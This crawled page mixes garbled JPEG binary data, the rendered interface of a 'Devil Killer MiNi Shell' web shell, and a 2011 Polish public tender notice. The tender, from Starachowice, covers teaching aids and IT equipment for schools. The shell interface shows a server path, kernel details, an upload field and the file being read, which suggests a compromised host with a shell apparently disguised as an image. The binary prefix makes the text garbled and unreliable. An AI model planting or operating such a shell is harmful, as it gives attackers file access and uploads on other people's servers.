JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111110/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111110/374020-N-2011.html

<p class="kh_header"><b>Starachowice: Dostawa pomocy dydaktycznych i wyposażenia do szkół w Gminie Starachowice oraz sprzętu informatycznego i biurowego w ramach projektów współfinansowanych z Europejskiego Funduszu Społecznego. Część I - Zakup i dostawa pomocy dydaktycznych, Część II - Zakup i dostawa sprzętu multimedialnego, Część III - Zakup i dostawa sprzętu informatycznego i biurowego</b><br>
<b>Numer ogłoszenia: 374020 - 2011; data zamieszczenia: 10.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Starachowice , ul. Radomska 45, 27-200 Starachowice, woj. świętokrzyskie, tel. 41 273 82 75, faks 41 273 82 75.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.um.starachowice.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pomocy dydaktycznych i wyposażenia do szkół w Gminie Starachowice oraz sprzętu informatycznego i biurowego w ramach projektów współfinansowanych z Europejskiego Funduszu Społecznego. Część I - Zakup i dostawa pomocy dydaktycznych, Część II - Zakup i dostawa sprzętu multimedialnego, Część III - Zakup i dostawa sprzętu informatycznego i biurowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa:
sprzętu multimedialnego oraz pomocy dydaktycznych w ramach realizacji zajęć dodatkowych wspierających indywidualizację procesu dydaktycznego w 8 szkołach podstawowych z terenu Gminy Starachowice w ramach projektu Indywidualizacja procesu nauczania i wychowania klas I-III w Gminie Starachowice w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowany ze środków Unii Europejskiej i dotacji celowej z budżetu krajowego.
sprzętu informatycznego i biurowego do projektu współfinansowanego z Europejskiego Funduszu Społecznego Moje Starachowice - innowacyjne zajęcia pozalekcyjne dla uczniów Gimnazjów w Starachowicach Program Operacyjny Kapitał Ludzki.
	Zamawiający podzielił zamówienie na 3 części:
	Część I - Zakup i dostawa pomocy dydaktycznych. Przedmiot zamówienia obejmuje zakup 
i dostawę pomocy dydaktycznych do prowadzenia zajęć w 8 szkołach podstawowych:
	Zadanie nr 1 - Doposażenie bazy dydaktycznej Szkoły Podstawowej nr 1 w Starachowicach,
			ul.1 Maja 11
Pakiet I - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami 
w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji.
Pakiet II - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.
Pakiet III - Pomoce dydaktyczne do prowadzenia zajęć logopedycznych.
Pakiet IV - Pomoce dydaktyczne do prowadzenia zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy.
Pakiet V - Pomoce dydaktyczne do prowadzenia zajęć rozwijających zainteresowania matematyczno - przyrodnicze uczniów.
Zadanie nr 2 - Doposażenie bazy dydaktycznej Szkoły Podstawowej nr 2 w Starachowicach			ul. Ostrowiecka 134
Pakiet I - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami 
w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji.
Pakiet II - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.
Pakiet III - Pomoce dydaktyczne do prowadzenia zajęć rozwijających zainteresowania matematyczno-przyrodnicze uczniów.
	Zadanie nr 3 - Doposażenie bazy dydaktycznej Szkoły Podstawowej nr 6 w Starachowicach
		        ul. Moniuszki 117
	Pakiet I - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami 
w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji.
	Pakiet II - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.
	Pakiet III - Pomoce dydaktyczne do prowadzenia zajęć rozwijających zainteresowania matematyczno-przyrodnicze uczniów.
	Zadanie nr 4 - Doposażenie bazy dydaktycznej Szkoły Podstawowej nr 9 w Starachowicach
	                        ul. Mrozowskiego 5.
	Pakiet I - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami 
w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji.
	Pakiet II - Pomoce dydaktyczne do prowadzenia zajęć logopedycznych.
	Zadanie nr 5 - Doposażenie bazy dydaktycznej Szkoły Podstawowej nr 10 z Oddziałami Integracyjnymi w Starachowicach, al. Armii Krajowej 1.
	Pakiet I - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami 
w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji.
	Pakiet II - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.
	Pakiet III - Pomoce dydaktyczne do prowadzenia zajęć logopedycznych.
	Pakiet IV - Pomoce dydaktyczne do prowadzenia zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy.
	Pakiet V - Pomoce dydaktyczne do prowadzenia zajęć rozwijających zainteresowania matematyczno-przyrodnicze uczniów.
Pakiet VI - Pomoce dydaktyczne do prowadzenia zajęć dla uczniów uzdolnionych artystycznie.
Pakiet VII - Pomoce dydaktyczne do prowadzenia zajęć socjoterapeutycznych.
	Zadanie nr 6 - Doposażenie bazy dydaktycznej Szkoły Podstawowej nr 11 w Starachowicach
	                        ul. Leśna 2.
	Pakiet I - Pomoce dydaktyczne do prowadzenia zajęć logopedycznych.
	Pakiet II - Pomoce dydaktyczne do prowadzenia zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy.
	Zadanie nr 7 - Doposażenie bazy dydaktycznej Szkoły Podstawowej nr 12 w Starachowicach
                              ul. Słoneczna 1a.
	Pakiet I - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami 
w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji.
	Pakiet II - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.
	Pakiet III - Pomoce dydaktyczne do prowadzenia zajęć logopedycznych.
	Pakiet IV - Pomoce dydaktyczne do prowadzenia zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy.
	Pakiet V - Pomoce dydaktyczne do prowadzenia zajęć rozwijających zainteresowania matematyczno-przyrodnicze uczniów.
	Pakiet VI - Pomoce dydaktyczne do prowadzenia zajęć dla uczniów uzdolnionych artystycznie.
	Zadanie nr 8 - Doposażenie bazy dydaktycznej Szkoły Podstawowej nr 13 w Starachowicach
	                         ul. Prądzyńskiego 2.
	Pakiet I - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami 
w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji.
	Pakiet II - Pomoce dydaktyczne do prowadzenia zajęć logopedycznych.
	Pakiet III - Pomoce dydaktyczne do prowadzenia zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy.
	Pakiet IV - Pomoce dydaktyczne do prowadzenia zajęć rozwijających zainteresowania matematyczno-przyrodnicze uczniów.
	Część II - Zakup i dostawa sprzętu multimedialnego:
Komputer przenośny typu laptop wraz z oprogramowaniem - 5 sztuk
Tablica interaktywna - 1 sztuka
Projektor multimedialny - 2 sztuki
Ekran projekcyjny - 1 sztuka
Radioodtwarzacz - 1 sztuka
Część III - Zakup i dostawa sprzętu informatycznego i biurowego: 
Aparat cyfrowy - 1 sztuka
Projektor - 1 sztuka
Notebook - 1 sztuka
Oprogramowanie do tworzenia prezentacji multimedialnych - 1 sztuka
Telefon bezprzewodowy - 1 sztuka
Niszczarka - 1 sztuka
Flipchart magnetyczny suchościeralny - 1 sztuka.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 37.52.41.00-8, 48.00.00.00-8, 39.16.21.10-9, 30.21.31.00-6, 30.19.14.00-8, 38.65.21.00-1, 38.65.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 20.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium może być wnoszone w jednej lub kilku następujących formach:
pieniądzu,
poręczeniach bankowych,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt 4 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz.596 i Nr 216, poz. 1824).
Wadium dla części I w wysokości : 2 000,00 zł	
należy wnieść:
1) w pieniądzu - przelewem na konto nr 17102026740000210200033225 Bank PKO BP SA   Oddział I w Ostrowcu Świętokrzyskim tytułem: WADIUM na przetarg Część I - Zakup i dostawa pomocy dydaktycznych - z takim wyliczeniem, aby wpłynęło na rachunek Zamawiającego najpóźniej w terminie złożenia oferty (wniesienie wadium przelewem oznacza uznanie kwoty wadium przez rachunek Zamawiającego);
2) w innych formach - w terminie składania oferty. Oryginał dokumentu zdeponować w kasie 
(w kopercie zaadresowanej na Urząd Miejski, Kasa ul. Radomska 45, 27-200 Starachowice, z dopiskiem WADIUM na przetarg Część I - Zakup i dostawa pomocy dydaktycznych, kopię dokumentu dołączyć do oferty).
Wykonawca, który nie wniesie wadium na zasadach określonych w SIWZ zostanie wykluczony z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w formularzu OFERTA w pkt 7 SIWZ,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w formularzu OFERTA w pkt 7 SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w formularzu OFERTA w pkt 7 SIWZ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w formularzu OFERTA w pkt 7 SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w formularzu OFERTA w pkt 7 SIWZ,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta winna zawierać co najmniej:
-wypełniony formularz OFERTA,
-kalkulacje ceny,
-pełnomocnictwo do reprezentowania Wykonawcy o ile ofertę składa pełnomocnik (oryginał lub kopia poświadczona notarialnie),
-dokumenty i oświadczenia wyszczególnione w punkcie 7 SIWZ,
-potwierdzenie wniesienia wadium (zgodnie z pkt 10 SIWZ)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 w/w ustawy Pzp zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy określając następujące warunki zmiany:
zmniejszenie wartości umowy w przypadku rezygnacji przez Zamawiającego z dostawy pomocy dydaktycznych do 5%</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.starachowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski 
Referat Zamówień Publicznych (pok. 111)
ul. Radomska 45
27- 200 Starachowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.11.2011 godzina 10:30, miejsce: Urząd Miejski  Biuro Obsługi Mieszkańców ul. Radomska 45 27-200 Starachowice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zakup i dostawa - sprzętu multimedialnego oraz pomocy dydaktycznych w ramach realizacji zajęć dodatkowych wspierających indywidualizację procesu dydaktycznego w 8 szkołach podstawowych z terenu Gminy Starachowice w ramach projektu Indywidualizacja procesu nauczania i wychowania klas I-III w Gminie Starachowice w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowany ze środków Unii Europejskiej i dotacji celowej z budżetu krajowego,
- sprzętu informatycznego i biurowego do projektu współfinansowanego z Europejskiego Funduszu Społecznego Moje Starachowice - innowacyjne zajęcia pozalekcyjne dla uczniów Gimnazjów w Starachowicach Program Operacyjny Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup i dostawa pomocy dydaktycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zakup 
i dostawę pomocy dydaktycznych do prowadzenia zajęć w 8 szkołach podstawowych:
	Zadanie nr 1 - Doposażenie bazy dydaktycznej Szkoły Podstawowej nr 1 w Starachowicach,
			ul.1 Maja 11
Pakiet I - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami 
w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji.
Pakiet II - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.
Pakiet III - Pomoce dydaktyczne do prowadzenia zajęć logopedycznych.
Pakiet IV - Pomoce dydaktyczne do prowadzenia zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy.
Pakiet V - Pomoce dydaktyczne do prowadzenia zajęć rozwijających zainteresowania matematyczno - przyrodnicze uczniów.
Zadanie nr 2 - Doposażenie bazy dydaktycznej Szkoły Podstawowej nr 2 w Starachowicach			ul. Ostrowiecka 134
Pakiet I - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami 
w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji.
Pakiet II - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.
Pakiet III - Pomoce dydaktyczne do prowadzenia zajęć rozwijających zainteresowania matematyczno-przyrodnicze uczniów.
	Zadanie nr 3 - Doposażenie bazy dydaktycznej Szkoły Podstawowej nr 6 w Starachowicach
		        ul. Moniuszki 117
	Pakiet I - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami 
w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji.
	Pakiet II - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.
	Pakiet III - Pomoce dydaktyczne do prowadzenia zajęć rozwijających zainteresowania matematyczno-przyrodnicze uczniów.
	Zadanie nr 4 - Doposażenie bazy dydaktycznej Szkoły Podstawowej nr 9 w Starachowicach
	                        ul. Mrozowskiego 5.
	Pakiet I - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami 
w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji.
	Pakiet II - Pomoce dydaktyczne do prowadzenia zajęć logopedycznych.
	Zadanie nr 5 - Doposażenie bazy dydaktycznej Szkoły Podstawowej nr 10 z Oddziałami Integracyjnymi w Starachowicach, al. Armii Krajowej 1.
	Pakiet I - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami 
w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji.
	Pakiet II - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.
	Pakiet III - Pomoce dydaktyczne do prowadzenia zajęć logopedycznych.
	Pakiet IV - Pomoce dydaktyczne do prowadzenia zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy.
	Pakiet V - Pomoce dydaktyczne do prowadzenia zajęć rozwijających zainteresowania matematyczno-przyrodnicze uczniów.
Pakiet VI - Pomoce dydaktyczne do prowadzenia zajęć dla uczniów uzdolnionych artystycznie.
Pakiet VII - Pomoce dydaktyczne do prowadzenia zajęć socjoterapeutycznych.
	Zadanie nr 6 - Doposażenie bazy dydaktycznej Szkoły Podstawowej nr 11 w Starachowicach
	                        ul. Leśna 2.
	Pakiet I - Pomoce dydaktyczne do prowadzenia zajęć logopedycznych.
	Pakiet II - Pomoce dydaktyczne do prowadzenia zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy.
	Zadanie nr 7 - Doposażenie bazy dydaktycznej Szkoły Podstawowej nr 12 w Starachowicach
                              ul. Słoneczna 1a.
	Pakiet I - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami 
w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji.
	Pakiet II - Pomoce dydaktyczne do prowadzenia zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.
	Pakiet III - Pomoce dydaktyczne do prowadzenia zajęć logopedycznych.
	Pakiet IV - Pomoce dydaktyczne do prowadzenia zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy.
	Pakiet V - Pomoce dydaktyczne do prowadzenia zajęć rozwijających zainteresowania matematyczno-przyrodnicze uczniów.
	Pakiet VI - Pomoce dydaktyczne do prowadzenia zajęć dla uczniów uzdolnionych artystycznie.
